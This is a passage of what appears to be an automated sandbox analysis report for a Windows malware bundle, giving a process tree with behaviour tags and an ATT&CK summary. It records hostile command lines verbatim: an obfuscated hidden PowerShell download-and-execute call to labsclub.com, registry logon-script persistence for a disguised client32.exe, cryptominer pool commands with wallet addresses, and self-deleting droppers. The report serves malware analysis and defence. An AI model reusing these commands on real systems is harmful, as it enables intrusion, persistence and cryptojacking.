- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3700 -
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"12⤵PID:5864
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif12⤵PID:4516
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe13⤵PID:2304
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:6984
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵
- Blocklisted process makes network request
PID:7512
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sm3c0y5era1\app.exe"C:\Users\Admin\AppData\Local\Temp\sm3c0y5era1\app.exe" /8-238⤵
- Executes dropped EXE
PID:2668 -
C:\Users\Admin\AppData\Local\Temp\sm3c0y5era1\app.exe"C:\Users\Admin\AppData\Local\Temp\sm3c0y5era1\app.exe" /8-239⤵PID:6716
-
-
-
C:\Users\Admin\AppData\Local\Temp\4jkurbqeatq\vpn.exe"C:\Users\Admin\AppData\Local\Temp\4jkurbqeatq\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4160 -
C:\Users\Admin\AppData\Local\Temp\is-S9QSD.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-S9QSD.tmp\vpn.tmp" /SL5="$402FA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\4jkurbqeatq\vpn.exe" /silent /subid=4829⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5352 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:5940
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:2416
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:6132
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:5132
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4628
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:7092
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\razpttoxc42\g4pugkmvbnp.exe"C:\Users\Admin\AppData\Local\Temp\razpttoxc42\g4pugkmvbnp.exe" /quiet SILENT=1 AF=7568⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:5396 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\razpttoxc42\g4pugkmvbnp.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\razpttoxc42\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617278300 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:1440
-
-
-
C:\Users\Admin\AppData\Local\Temp\am12n3ic41n\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\am12n3ic41n\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5544 -
C:\Users\Admin\AppData\Local\Temp\is-HP063.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-HP063.tmp\IBInstaller_97039.tmp" /SL5="$204AA,14574507,721408,C:\Users\Admin\AppData\Local\Temp\am12n3ic41n\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5880 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-MBMQE.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:5160
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-MBMQE.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵
- Drops file in Windows directory
PID:4192
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^¶m=10⤵PID:7360
-
-
C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"10⤵
- Loads dropped DLL
PID:6652
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f10⤵PID:2520
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\EC8XB7WYGL\setups.exe"C:\Users\Admin\AppData\Local\Temp\EC8XB7WYGL\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Users\Admin\AppData\Local\Temp\is-0P19I.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-0P19I.tmp\setups.tmp" /SL5="$6002E,454998,229376,C:\Users\Admin\AppData\Local\Temp\EC8XB7WYGL\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:196
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3968
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵
- Executes dropped EXE
PID:4464 -
C:\Users\Admin\AppData\Roaming\908D.tmp.exe"C:\Users\Admin\AppData\Roaming\908D.tmp.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:1268 -
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:4680
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:5188
-
-
-
C:\Users\Admin\AppData\Roaming\9244.tmp.exe"C:\Users\Admin\AppData\Roaming\9244.tmp.exe"5⤵
- Executes dropped EXE
PID:1300 -
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\9244.tmp.exe6⤵PID:636
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:4388
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:2220
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:1444
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1120
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵
- Executes dropped EXE
PID:5288
-
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4812 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:3612
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3608
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4148
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4084
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:684
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:5664 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 65253D5010569FD42C498B9D33665490 C2⤵
- Loads dropped DLL
PID:5436
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8AFAF89FF656385098767B37C91C2A252⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:4580
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
- Drops file in Windows directory
PID:6492 -
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵
- Adds Run key to start application
PID:8712 -
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"4⤵PID:5404
-
-
-
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\2f59daff2b0f4631a63ba87b5ad200a4 /t 1696 /p 6841⤵PID:4968
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\b0a044b38e694319902090fb8f9d0e48 /t 2592 /p 28521⤵PID:4100
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6112
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:656
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\214b6c722b864289b086f735da210fb9 /t 1404 /p 61121⤵PID:6432
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:852 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{447d59ab-9ce5-0e46-9a70-4f486d259151}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:6388
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:6628
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:4760
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:5556
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:6604
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:5856 -
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:8792
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6744
-
C:\Users\Admin\AppData\Local\Temp\EAA1.exeC:\Users\Admin\AppData\Local\Temp\EAA1.exe1⤵PID:8720
-
C:\Users\Admin\AppData\Local\Temp\EDFD.exeC:\Users\Admin\AppData\Local\Temp\EDFD.exe1⤵PID:9204
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:8936
-
C:\Users\Admin\AppData\Local\Temp\4E1.exeC:\Users\Admin\AppData\Local\Temp\4E1.exe1⤵PID:9140
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\4E1.exe"2⤵PID:7860
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:2368
-
-
-
C:\Users\Admin\AppData\Local\Temp\2D5A.exeC:\Users\Admin\AppData\Local\Temp\2D5A.exe1⤵
- Checks processor information in registry
PID:8288 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 2D5A.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\2D5A.exe" & del C:\ProgramData\*.dll & exit2⤵PID:7304
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 2D5A.exe /f3⤵
- Kills process with taskkill
PID:8360
-
-
-
C:\Users\Admin\AppData\Local\Temp\5601.exeC:\Users\Admin\AppData\Local\Temp\5601.exe1⤵PID:6452
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6192
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:6112
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:856
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:6212
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Drops file in Windows directory
PID:6744
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:9012
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6644
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:8992
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:2176
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
Disabling Security Tools
3Install Root Certificate
1Modify Registry
6Web Service
1